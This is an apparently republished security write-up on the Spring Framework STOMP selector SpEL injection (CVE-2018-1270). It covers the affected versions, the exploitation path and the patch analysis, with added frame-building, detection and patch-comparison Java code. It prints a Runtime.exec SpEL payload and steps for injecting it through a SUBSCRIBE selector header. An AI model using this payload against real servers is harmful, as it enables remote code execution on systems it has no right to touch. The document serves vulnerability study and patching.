2025-02-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article walks through the analysis of the spring-messaging remote code execution vulnerability (CVE-2018-1270): the affected versions, the trigger path through the STOMP selector header, and the patch.
0x00 Vulnerability overview
On April 5, 2018, the Spring team at Pivotal published a security announcement covering three vulnerabilities in the Spring Framework, among them CVE-2018-1270, which can lead to remote code execution.
After analysing the vulnerability, 360-CERT rates its impact as serious. A PoC has already been published, so affected users are advised to assess their exposure and upgrade as soon as possible.
0x01 Impact
Affected versions
Spring Framework 5.0 to 5.0.4
Spring Framework 4.3 to 4.3.14
Older, no longer supported versions are also affected
Fixed versions
5.0.x users upgrade to version 5.0.5
4.3.x users upgrade to version 4.3.15
0x02 Vulnerability details
CVE-2018-1270
The spring-messaging module of the Spring Framework implements STOMP (Simple Text Oriented Messaging Protocol), a simple text-based messaging protocol that Spring carries over WebSocket: each STOMP frame travels as a WebSocket message. An attacker who can open a WebSocket connection to the application and send STOMP messages can obtain remote code execution. If the application additionally enforces authentication and authorization with Spring Security, exploitation becomes harder, but the underlying flaw is not removed.
CVE-2018-1271
When Spring MVC serves static resources from the file system on Windows, a specially crafted URL can lead to a directory traversal attack.
The vulnerability only triggers under a fairly narrow set of conditions, all of which must hold:
The server runs on Windows
Static resources are served from the file system (for example with a file: location) rather than from the classpath or the ServletContext
The fix for CVE-2018-1199 has not been applied
The server is not Tomcat or WildFly
CVE-2018-1272
When a Spring MVC or WebFlux application receives a multipart request from a client and forwards it to another server, an attacker can craft a polluted multipart request that escalates privileges on that downstream server.
0x03 CVE-2018-1270 vulnerability analysis
SpEL
SpEL (Spring Expression Language) is an expression language that supports querying and manipulating an object graph at runtime. Its syntax is similar to the traditional Unified EL, but it adds features such as method invocation, type references and string templating. Those extra features are what make an expression built from untrusted input dangerous: with a StandardEvaluationContext the T() type reference can reach any class on the classpath.
SpEL usage
The page's own snippet, with the parser setup it omitted and the escaping repaired:

import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;

ExpressionParser parser = new SpelExpressionParser();
// T(...) resolves java.lang.Runtime; the expression then executes a command
String expression = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";
String result = parser.parseExpression(expression).getValue().toString();
Vulnerability trigger process
Set up spring-message project demo (https://github.com/spring-guides/gs-messaging-stomp-websocket)
The static resource app.js runs in the browser and talks to the server over WebSocket; its connect() function opens a SockJS socket and establishes a STOMP session over it:

var stompClient = null;

function connect() {
    var socket = new SockJS('/gs-guide-websocket');
    stompClient = Stomp.over(socket);
    // First argument: connect headers (empty here); second: callback on CONNECTED
    stompClient.connect({}, function (frame) {
        setConnected(true);
        console.log('Connected: ' + frame);
        // SUBSCRIBE frame for /topic/greetings; the selector header is added to this call
        stompClient.subscribe('/topic/greetings', function (greeting) {
            showGreeting(JSON.parse(greeting.body).content);
        });
    });
}
Step 1
Add a selector header to the SUBSCRIBE frame. Spring's simple broker honours a selector header on subscriptions and uses its value to filter which messages the subscription receives; the value is parsed as a SpEL expression. On the server, SimpleBrokerMessageHandler.handleMessageInternal handles the SUBSCRIBE frame and calls registerSubscription; DefaultSubscriptionRegistry then reads the selector header, parses it with the SpEL parser and stores the resulting Expression together with the subscription for that session.
Step 2
Click send to deliver any message to the server. When Spring fans the message out to subscribers, DefaultSubscriptionRegistry.filterSubscriptions evaluates each stored selector with expression.getValue(context, Boolean.class). Because that context is a StandardEvaluationContext, a selector such as T(java.lang.Runtime).getRuntime().exec(...) is executed as part of the match, giving arbitrary command execution.
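The two frames from Step 1 and Step 2 as bytes on the wire, and what the server decodes from them, as an added example that is not part of the 360-CERT write-up or of Spring's own code. It uses spring-messaging's StompEncoder and StompDecoder (assumed on the classpath, 5.0.x) so the frames are exactly what the broker would receive; the destinations come from the guide demo above, while the subscription id, the benign selector value and the looksLikeCodeExecution heuristic are illustrative choices of this example.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.regex.Pattern;

import org.springframework.messaging.Message;
import org.springframework.messaging.simp.stomp.StompCommand;
import org.springframework.messaging.simp.stomp.StompDecoder;
import org.springframework.messaging.simp.stomp.StompEncoder;
import org.springframework.messaging.simp.stomp.StompHeaderAccessor;
import org.springframework.messaging.support.MessageBuilder;

public class SelectorFrames {

    // Selector value the simple broker would parse as SpEL. A harmless type reference
    // stands in for the Runtime.exec payload described above; it has the same shape
    // and travels in exactly the same header (illustrative, not a published PoC).
    static final String SELECTOR = "T(java.lang.System).getProperty('user.home') != null";

    // Heuristic for logs or a WebSocket-aware proxy: a legitimate selector compares
    // message headers (e.g. headers['priority'] == 'high'); type references T(...),
    // constructors and bean references have no business in one.
    private static final Pattern SUSPICIOUS = Pattern.compile("T\\s*\\(|\\bnew\\s+\\w|@\\w+");

    static boolean looksLikeCodeExecution(String selector) {
        return selector != null && SUSPICIOUS.matcher(selector).find();
    }

    /** Step 1: the SUBSCRIBE frame carrying the attacker-controlled selector header. */
    static byte[] subscribeFrame(String selector) {
        StompHeaderAccessor accessor = StompHeaderAccessor.create(StompCommand.SUBSCRIBE);
        accessor.setSubscriptionId("sub-0");              // illustrative id
        accessor.setDestination("/topic/greetings");
        accessor.setNativeHeader("selector", selector);   // the injection point
        Message<byte[]> frame = MessageBuilder.createMessage(new byte[0], accessor.getMessageHeaders());
        return new StompEncoder().encode(frame);
    }

    /** Step 2: any SEND that makes the broker fan out to subscribers and evaluate the selectors. */
    static byte[] sendFrame(String jsonBody) {
        StompHeaderAccessor accessor = StompHeaderAccessor.create(StompCommand.SEND);
        accessor.setDestination("/app/hello");
        byte[] payload = jsonBody.getBytes(StandardCharsets.UTF_8);
        Message<byte[]> frame = MessageBuilder.createMessage(payload, accessor.getMessageHeaders());
        return new StompEncoder().encode(frame);
    }

    /** What the server's decoder hands to the broker: the selector header arrives untouched. */
    static String selectorSeenByServer(byte[] wireBytes) {
        List<Message<byte[]>> decoded = new StompDecoder().decode(ByteBuffer.wrap(wireBytes));
        StompHeaderAccessor accessor = StompHeaderAccessor.wrap(decoded.get(0));
        return accessor.getFirstNativeHeader("selector");
    }

    public static void main(String[] args) {
        byte[] subscribe = subscribeFrame(SELECTOR);
        System.out.println("--- SUBSCRIBE frame on the wire ---");
        System.out.println(new String(subscribe, StandardCharsets.UTF_8));

        String selector = selectorSeenByServer(subscribe);
        System.out.println("selector header as parsed by the server: " + selector);
        System.out.println("flagged by heuristic: " + looksLikeCodeExecution(selector));

        System.out.println("--- SEND frame on the wire ---");
        System.out.println(new String(sendFrame("{\"name\":\"test\"}"), StandardCharsets.UTF_8));
    }
}
```

In the browser the same SUBSCRIBE frame is produced by stomp.js through the third argument of the subscribe call in app.js, stompClient.subscribe('/topic/greetings', callback, {selector: '...'}). The heuristic is the kind of check a ChannelInterceptor on the inbound channel or a WebSocket-aware proxy could apply as a detection, but it is not a fix: the selector is still handed to the SpEL parser, and the actual fix is the evaluation-context change in the patch.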
Patch analysis
Patch: https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a#diff-ca84ec52e20ebb2a3732c6c15f37d37a
-import org.springframework.expression.spel.support.StandardEvaluationContext
+ import org.springframework.expression.spel.support.SimpleEvaluationContext
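Review bot: the import swap on its own does not change behaviour; the site in this file that constructs the evaluation context for the selector must move from `new StandardEvaluationContext(...)` to a `SimpleEvaluationContext` builder (for example `SimpleEvaluationContext.forPropertyAccessors(...).withRootObject(...).build()`) in the same commit. A leftover construction in this file would fail to compile against the new import, but a leftover in another class that evaluates the selector would not, so the reviewer should grep for remaining StandardEvaluationContext uses on the selector path rather than rely on the compiler.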
The StandardEvaluationContext import is removed and SimpleEvaluationContext is used in its place. StandardEvaluationContext exposes the full SpEL feature set, including type references, constructors, bean references and arbitrary method invocation, so any attacker-controlled selector can run code. SimpleEvaluationContext, introduced with the fix in 5.0.5 and 4.3.15, is limited to a subset of SpEL suited to data binding: it only resolves properties through the PropertyAccessor instances it is built with, and it has no type locator, so T(...) expressions fail to evaluate. This keeps selectors that compare message headers working while removing the path to Runtime.exec.
SimpleEvaluationContext source: https://github.com/spring-projects/spring-framework/blob/v5.0.5.RELEASE/spring-expression/src/main/java/org/springframework/expression/spel/support/SimpleEvaluationContext.java
StandardEvaluationContext source: https://github.com/spring-projects/spring-framework/blob/v5.0.5.RELEASE/spring-expression/src/main/java/org/springframework/expression/spel/support/StandardEvaluationContext.java
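The effect of the patch on a selector, as an added example that is not from the write-up or from Spring's commit: the same two selectors are evaluated first under the StandardEvaluationContext the vulnerable code used and then under a SimpleEvaluationContext. It assumes spring-expression 5.0.5 or later on the classpath. The Headers bean is a stand-in for the message root object (the real patch binds the Message and a SimpMessageHeaderPropertyAccessor through forPropertyAccessors; forReadOnlyDataBinding over a plain bean is enough to show the difference), and the malicious selector uses a harmless System.getProperty type reference in place of Runtime.exec.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SelectorEvaluation {

    /** Stand-in root object: a bean exposing a header a selector may legitimately compare. */
    public static class Headers {
        private final String priority;
        public Headers(String priority) { this.priority = priority; }
        public String getPriority() { return priority; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    /** Pre-patch: full SpEL, so type references resolve and methods on them run. */
    static Boolean evaluateWithStandardContext(String selector, Headers root) {
        EvaluationContext ctx = new StandardEvaluationContext(root);
        return PARSER.parseExpression(selector).getValue(ctx, Boolean.class);
    }

    /** Post-patch: data-binding subset only, property access on the root object. */
    static Boolean evaluateWithSimpleContext(String selector, Headers root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        return PARSER.parseExpression(selector).getValue(ctx, Boolean.class);
    }

    public static void main(String[] args) {
        Headers message = new Headers("high");
        String legitimate = "priority == 'high'";
        // Harmless stand-in for the Runtime.exec payload: same T(...) type reference shape
        String malicious = "T(java.lang.System).getProperty('user.home') != null";

        System.out.println("standard / legitimate: " + evaluateWithStandardContext(legitimate, message));
        System.out.println("standard / malicious : " + evaluateWithStandardContext(malicious, message));
        System.out.println("simple   / legitimate: " + evaluateWithSimpleContext(legitimate, message));
        try {
            System.out.println("simple   / malicious : " + evaluateWithSimpleContext(malicious, message));
        } catch (SpelEvaluationException e) {
            // The simple context has no type locator, so T(...) is rejected before any method runs
            System.out.println("simple   / malicious : rejected: " + e.getMessage());
        }
    }
}
```

Under the standard context both selectors evaluate to true, the second one having resolved java.lang.System through T() and invoked a method on it. Under the simple context the property comparison still works, while the type reference fails in the context's type locator with a SpelEvaluationException before anything is invoked. That is the whole fix: selectors that only compare headers keep working, and the path to Runtime.exec is gone.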